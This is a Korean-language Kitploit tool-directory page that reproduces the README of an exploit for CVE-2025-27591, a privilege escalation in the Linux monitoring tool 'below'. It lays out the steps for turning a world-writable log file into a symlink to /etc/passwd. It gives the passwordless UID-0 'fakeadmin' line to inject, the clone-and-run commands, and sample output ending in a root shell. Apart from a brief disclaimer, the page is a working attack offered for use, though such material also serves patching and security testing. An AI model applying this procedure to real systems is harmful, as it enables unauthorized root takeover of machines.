Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-27591 — 🔥 로컬 권한 상승 익스플로잇 for CVE-2025-27591 | Below의 전역 쓰기 가능 로그 디렉토리를 악용하여 /etc/passwd 주입을 통해 루트 권한 획득 | Kitploit
도구/GitHubGitHub/00xcanelo/cve-2025-27591
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHub00xcanelo/cve-2025-27591

CVE-2025-27591

🔥 로컬 권한 상승 익스플로잇 for CVE-2025-27591 | Below의 전역 쓰기 가능 로그 디렉토리를 악용하여 /etc/passwd 주입을 통해 루트 권한 획득

저장소 보기
2521년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-27591 – below에서 심볼릭 링크 남용을 통한 권한 상승

Author CVE

🛑 면책 조항: 이 익스플로잇은 교육 및 승인된 보안 테스트 용도로만 제공됩니다. 승인되지 않은 사용은 불법일 수 있습니다.


🧠 개요

below는 Facebook이 Linux 시스템용으로 개발한 성능 모니터링 도구입니다. 패치 릴리스 이전의 below 버전은 전역 쓰기 가능 로그 디렉토리와 세니타이즈되지 않은 로그 처리를 악용하여 권한이 없는 사용자가 root로 권한을 상승시킬 수 있는 치명적인 취약점의 영향을 받습니다.


🔎 CVE 세부 정보

필드값
CVE 식별자CVE-2025-27591
심각도🔥 치명적 (CVSS ≈ 7.8 - 8.8)
공격 벡터로컬
영향root(UID=0)로 권한 상승
익스플로잇 유형심볼릭 링크 남용 / 로그 파일 주입
영향을 받는 앱below – 일반적으로 /usr/bin/below에 설치됨
근본 원인/var/log/below/에 대한 권한 확인 없이 안전하지 않은 파일 쓰기

💥 익스플로잇 로직

이 Bash 스크립트는 다음을 수행합니다:

  1. 전역 쓰기 가능 디렉토리 확인:

    • /var/log/below가 전역 쓰기 가능한지 확인 (위험 신호).
  2. 심볼릭 링크 공격 준비:

    • 기존 error_root.log(있는 경우)를 삭제하고 /etc/passwd로의 심볼릭 링크를 생성합니다.
  3. 페이로드 구성:

    • /etc/passwd에 가짜 root 사용자를 추가합니다:
      root@kitploit:~
      fakeadmin::0:0:fakeadmin:/root:/bin/bash
      
  4. 로깅 트리거:

    • 취약한 바이너리가 로그를 쓰도록 강제하기 위해 sudo below record를 실행합니다.
  5. root 액세스 획득:

    • 비밀번호 프롬프트 없이 root 셸을 얻기 위해 su fakeadmin을 사용합니다.

📁 디렉토리 구조

root@kitploit:~
CVE-2025-27591/
├── exploit.sh
├── README.md

✅ 사전 요구 사항

익스플로잇을 실행하기 전에 다음이 있는지 확인하십시오:

  • 배쉬 셸 (리눅스 시스템)
  • 취약한 바이너리 설치: /usr/bin/below
  • 전역 쓰기 가능 로그 디렉토리: /var/log/below
  • sudo 권한으로 실행: sudo below record
  • 사용 가능한 도구:
    • ln (심볼릭 링크 생성)
    • su (사용자 전환)
    • timeout (실행 시간 제어)
    • whoami (권한 확인 용)

🚀 익스플로잇 단계

root@kitploit:~
# 1. 저장소 클론
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591

# 2. 스크립트에 실행 권한 부여
chmod +x exploit.sh

# 3. 익스플로잇 실행
./exploit.sh

🧪 샘플 출력

root@kitploit:~
[*] CVE-2025-27591 취약점 확인 중...
[+] /var/log/below가 전역 쓰기 가능입니다.
[!] 기존 로그 파일 발견: 삭제 중...
[+] 심볼릭 링크 생성됨: /var/log/below/error_root.log -> /etc/passwd

[*] 악성 라인을 /tmp/fakeadmin에 쓰는 중
[*] 'sudo below record'를 통해 로깅 트리거 중...
[+] 'below record' 실행됨 (또는 시간 초과)

[*] 심볼릭 링크를 통해 /etc/passwd에 페이로드 쓰기 시도 중...
[+] 페이로드가 성공적으로 추가됨.

[*] 'su fakeadmin'을 사용하여 root 셸로 전환 시도 중...
root@target:/# whoami
root
도구 다운로드